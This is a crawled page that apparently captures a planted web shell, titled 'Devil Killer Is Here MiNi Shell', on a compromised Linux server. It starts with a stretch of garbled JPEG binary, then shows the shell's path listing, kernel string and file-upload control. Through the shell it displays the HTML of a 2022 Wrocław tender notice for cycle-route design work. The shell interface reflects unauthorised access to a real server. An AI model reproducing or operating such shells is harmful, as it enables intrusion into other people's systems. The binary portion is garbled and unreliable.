JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220304/0007592501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej dla zadania <br/>„05800 budowa trasy rowerowej łączącej <br/>Gminę Kąty Wrocławskie z istniejącą infrastrukturą rowerową na ul. Mokronoskiej we Wrocławiu”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wrocław, w imieniu i na rzecz której działają Wrocławskie Inwestycje Sp. z o. o. z siedzibą przy ul. Ofiar Oświęcimskich 36, 50-059 Wrocław na podstawie pełnomocnictwa Prezydenta Wrocławia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020568529</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ofiar Oświęcimskich 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-059</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wi.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.wi.wroc.pl/html/przetargi.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej dla zadania <br/>„05800 budowa trasy rowerowej łączącej <br/>Gminę Kąty Wrocławskie z istniejącą infrastrukturą rowerową na ul. Mokronoskiej we Wrocławiu”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bb832a52-9ba4-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00075925</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00031360/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 05800 - Droga dla rowerów w ciągu ul. Mokronoskiej od granic miasta do ul. Kwiatkowskiego- wykonanie dokumentacji projektowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.wi.wroc.pl/html/przetargi.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest przy<br/>użyciu środków komunikacji elektronicznej. Ofertę można złożyć wyłącznie za pośrednictwem<br/>miniPortalu (https://miniportal.uzp.gov.pl/), ePUAP (https://epuap.gov.pl/wps/portal). Zamawiający<br/>wymaga złożenia oferty, pod rygorem nieważności, za pośrednictwem miniPortalu oraz elektronicznej<br/>skrzynki podawczej (ePuap). Pozostała korespondencja pomiędzy Zamawiającym a Wykonawcami w<br/>szczególności składanie zapytań, uzupełnień w postaci oświadczeń, wniosków, zawiadomień oraz<br/>przekazywanie informacji (za wyjątkiem złożenia, zmiany lub wycofania oferty) odbywa się<br/>elektronicznie za pośrednictwem skrzynki e-mailowej: przetargi@wi.wroc.pl. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem ogłoszenia (BZP).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>Złożenia, zmiany lub wycofania oferty lub wniosku.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w ”Instrukcji Użytkownika systemu” dotyczącej systemu mini portal<br/>(link:https://www.uzp.gov.pl/__data/assets/pdf_file/0030/37596/Instrukcja-Uzytkownika-<br/>SystemuminiPortal<br/>ePUAP.pdf) oraz Regulaminie ePUAP (link: https://pz.gov.pl/pz/regulations) .<br/>3. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>skutecznego przekazania ePUAP.<br/>4. Identyfikator postępowania i klucz publiczny dla danego postępowania o udzielenie zamówienia<br/>dostępne są na Liście wszystkich postępowań na miniPortalu. Adres internetowy pod którym dostępny<br/>jest identyfikator postępowania i klucz publiczny Zamawiający udostępnia na stronie internetowej<br/>http://www.wi.wroc.pl.<br/>Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Formularza dostępnego na<br/>ePUAP, (Dane odbiorcy: WROCŁAWSKIE INWESTYCJE SPÓŁKA Z OGRANICZONĄ<br/>ODPOWIEDZIALNOŚCIĄ, Adres skrzynki ePUAP: \WIWroclaw\SkrytkaESP) uprzednio zaszyfrowaną<br/>za pomocą klucza publicznego dostępnego na miniPortal. 16.3.6. Wykonawca, pod rygorem<br/>nieważności, składa ofertę, za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego na miniPortalu (poprzez miniPortal Wykonawca<br/>wybiera ikonę Formularz do komunikacji, gdzie zostaje przekierowany na ePuap). Klucz publiczny<br/>niezbędny do zaszyfrowania oferty przez Wykonawcę jest dostępny dla wykonawców na miniPortalu.<br/>Oferta powinna być sporządzona w języku polskim, z zachowaniem formy elektronicznej (podpisanej<br/>kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym w formacie danych .pdf, .doc, .docx, .rtf, .xps, .odt. Sposób złożenia oferty, w<br/>tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika systemu” dotyczącej miniPortal.<br/>Ofertę należy złożyć w oryginale.<br/>5. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia<br/>1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w osobnym (wydzielonym) pliku wraz z jednoczesnym<br/>zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami<br/>stanowiącymi jawną część skompresowane do jednego pliku archiwum (ZIP). Wykonawca składa<br/>ofertę, zmienia ją lub wycofuje za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego na miniPortalu (poprzez miniPortal Wykonawca<br/>wybiera ikonę Formularz do komunikacji, gdzie zostaje przekierowany na ePuap). Pozostała<br/>korespondencja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie zapytań,<br/>uzupełnień w postaci oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (za<br/>wyjątkiem złożenia, zmiany lub wycofania oferty) odbywa się elektronicznie za pośrednictwem skrzynki<br/>e-mailowej: przetargi@wi.wroc.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu w sprawie<br/>podmiotowych środków dowodowych oraz rozporządzeniu w sprawie sposobu sporządzenia i<br/>przekazywania informacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ze względu na ograniczoną liczbę znaków w niniejszej<br/>sekcji ogłoszenia szczegółowe informacje dotyczące RODO znajdują się w Instrukcji dla Wykonawców.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ze względu na ograniczoną liczbę znaków w niniejszej<br/>sekcji ogłoszenia szczegółowe informacje dotyczące RODO znajdują się w Instrukcji dla Wykonawców.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/10/TP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>4.1.	Opracowanie projektu (budowlanego oraz wykonawczych) budowy odcinka trasy rowerowej wzdłuż <br/>ul. Mokronoskiej od Kwiatkowskiego od granic Wrocławia po południowej stronie o długości ok. 500 m. <br/>Wykonanie specyfikacji technicznych wykonania i odbioru robót, kosztorysu inwestorskiego, przedmiarów robót, przygotowanie wszelkich dokumentów, opracowań, pozwoleń, decyzji i materiałów w celu skutecznego złożenia wniosku o wydanie decyzji pozwolenia na budowę (jeżeli będzie wymagane) wraz z pozyskaniem takiej decyzji posiadającej walor ostateczności – łącznie wszystkie elementy niezbędne do przeprowadzenia postępowania o udzielenie zamówienia publicznego na wybór wykonawcy robót i wykonania tych robót.<br/>4.2.	Organizacja ruchu docelowego:<br/>Wykonawca jest zobowiązany wykonać projekt docelowej organizacji ruchu wraz z opinią ZDiUM <br/>i uzgodnieniem WIM. <br/>W przypadku organizacji ruchu docelowego zakłada się:<br/>Oznakowanie poziome należy zaprojektować zgodnie z wymogami zawartymi w Załączniku do Dz.U. nr 220 poz. 2181 z dnia 23.12.2003 oraz wytycznymi Zarządu Dróg i Utrzymania Miasta we Wrocławiu.<br/>Oznakowanie pionowe zaprojektowane na słupkach zwykłych oraz na słupkach odgiętych należy wykonać przy zachowaniu odległości tarcz i tablic tych znaków od krawędzi jezdni w granicach od 0,5 m do 2,0m.<br/>4.3.	Projektowane znaki pionowe, poziome i urządzenia bezpieczeństwa ruchu drogowego powinny spełniać wymogi ZDiUM<br/>4.4.	Czynny udział w postępowaniu przetargowym na wyłonienie Wykonawcy robót budowlanych poprzez niezwłoczne udzielanie odpowiedzi na pytania Oferentów dotyczące rozwiązań projektowych w dokumentacji projektowej.<br/>4.5.	Sprawowanie nadzoru autorskiego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71400000-2 - Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt. 7<br/>ustawy Pzp stosowanym na podstawie art. 305 pkt 1) ustawy Pzp, w okresie 3 lat od dnia udzielenia<br/>zamówienia podstawowego, dotychczasowemu wykonawcy usług, zamówienia polegającego na<br/>powtórzeniu podobnych usług jak w zamówieniu podstawowym i zgodnego z jego przedmiotem, a<br/>całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości.<br/>2. Zakres prac objętych ewentualnym zamówieniem podobnym został opisany w Części III SWZ.<br/>3. Zamówienia, o których mowa powyżej zostaną udzielone na warunkach analogicznych do tych<br/>wynikających ze wzoru Umowy, z zastrzeżeniem zmian ściśle związanych ze specyfiką danego<br/>zamówienia oraz wynikających ze zmian przepisów prawa oraz norm technicznych, czy też zmian<br/>czynników cenotwórczych, które miały miejsce pomiędzy dniem zawarcia umowy w sprawie<br/>zamówienia podstawowego a dniem zawarcia umowy w sprawie zamówienia podobnego. Stosownie<br/>do art. 306 ust. 2 ustawy Pzp Wykonawca, przed zawarciem umowy zobowiązany będzie złożyć<br/>oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o niepodleganiu wykluczeniu z<br/>postępowania, a na żądanie Zamawiającego, również dokumenty potwierdzające złożone<br/>oświadczenia, w zakresie nie szerszym niż w postępowaniu o udzielenie zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności drogowej (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki<br/>udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej tj. muszą:<br/>1.1. posiadać niezbędną wiedze i doświadczenie. Warunek ten uważa się za spełniony jeżeli:<br/>1.1.1. Wykonawca wykonał w okresie ostatnich 10 lat przed upływem składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną dokumentację<br/>projektową (projekt budowlany i wykonawczy) budowy lub przebudowy lub remontu chodnika,<br/>ścieżki rowerowej, ciągu pieszo-rowerowego, drogi dla rowerów, ulicy lub drogi każda o długości<br/>co najmniej 300 m w terenie miejskim<br/>UWAGA! W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie<br/>niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i zawodowy. W myśl<br/>postanowieniom art. 117 ust. 3 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach poszczególnych członków konsorcjum, którzy<br/>wykonają usługi do realizacji, których te zdolności są wymagane. Zgodnie z art. 117 ust. 4<br/>ustawy Pzp. wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni członkowie konsorcjum –<br/>wzór w Załączniku 5. Oświadczenie dotyczące zakresu deklarowanych prac jakie będą<br/>wykonywać poszczególni wykonawcy wspólnie ubiegający się o udzielenie zamówienia winno być zgodne z warunkiem udziału w postępowaniu jakim wykazywał się dany członek<br/>konsorcjum.<br/>oraz<br/>1.2. wskazać do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby<br/>odpowiedzialne za świadczenie usług i robót budowlanych wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, wykształcenia i doświadczenia niezbędnych do wykonania<br/>zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacja o podstawie<br/>do dysponowania tymi osobami:<br/>1.2.1. Projektant w specjalności drogowej (1 osoba) - posiadający doświadczenie polegające na<br/>opracowaniu jako projektant co najmniej jednej dokumentacji projektowej tj. projektu<br/>budowlanego i projektu wykonawczego budowy lub przebudowy lub remontu chodnika, ścieżki<br/>rowerowej, ciągu pieszo-rowerowego, drogi dla rowerów, ulicy lub drogi każda o długości co<br/>najmniej 300 m w terenie miejskim oraz posiadający uprawnienia budowlanie do projektowania<br/>bez ograniczeń w specjalności inżynieryjnej drogowej, o których mowa w ustawie z dnia 7 lipca<br/>1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane wydane na<br/>podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ,<br/>zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej lub zgodnie z wcześniej obowiązującymi<br/>przepisami dotyczące uznawania kwalifikacji.<br/>9.2. Zamawiający wyjaśnia, że:<br/>a) osoby posiadające uprawnienia budowlane wydane na terenie UE mogą uzyskać decyzję w<br/>sprawie uznania kwalifikacji zawodowych oraz wpis do stosownej izby na zasadach określonych<br/>w Ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej oraz w Regulaminie postępowania w sprawie<br/>uznawania kwalifikacji do wykonywania samodzielnych funkcji technicznych w budownictwie<br/>obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw<br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o<br/>Europejskim Obszarze Gospodarczym, którzy nabyli w tych państwach, kwalifikacje<br/>odpowiadające uprawnieniom budowlanym w Polsce. (uchwalony mocą uchwały Krajowej Rady<br/>Polskiej Izby Inżynierów Budownictwa Uchwała nr 7/R/16 Krajowej Rady Polskiej Izby<br/>Inżynierów Budownictwa z dnia 18 maja 2016 r.) W razie uzyskania uznania kwalifikacji w<br/>zakresie wymaganym zgodnie z postanowieniami niniejszego punktu oraz wpisu do Izby<br/>Inżynierów Budownictwa uznaje się, że Wykonawca wykazał spełnienie warunków określonych<br/>w tym zakresie,<br/>b) pojęcia: „budowa”, „przebudowa”, „remont”, o których mowa w powyżej jest rozumiane<br/>zgodnie z definicją zawartą w art. 3 pkt. 6, 7a, 8 ustawy Prawo budowlane;<br/>c) teren miejski - teren położony w granicach administracyjnych miasta<br/>d) pojęcie ścieżki rowerowej/ciągu pieszo-rowerowego/drogi dla rowerów o których mowa<br/>powyżej są rozumiane zgodnie z definicją zawartą w art. 4 pkt 11a) ustawy o drogach<br/>publicznych z dnia 21 marca 1985r.;<br/>e) pojęcie ulicy o którym mowa powyżej są rozumiane zgodnie z definicją zawartą w art. 4 pkt 3)<br/>ustawy o drogach publicznych z dnia 21 marca 1985r.;<br/>f) pojęcie drogi o którym mowa powyżej są rozumiane zgodnie z definicją zawartą w art. 4 pkt 2)<br/>ustawy o drogach publicznych z dnia 21 marca 1985r.; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający zgodnie z art. 274 ust. 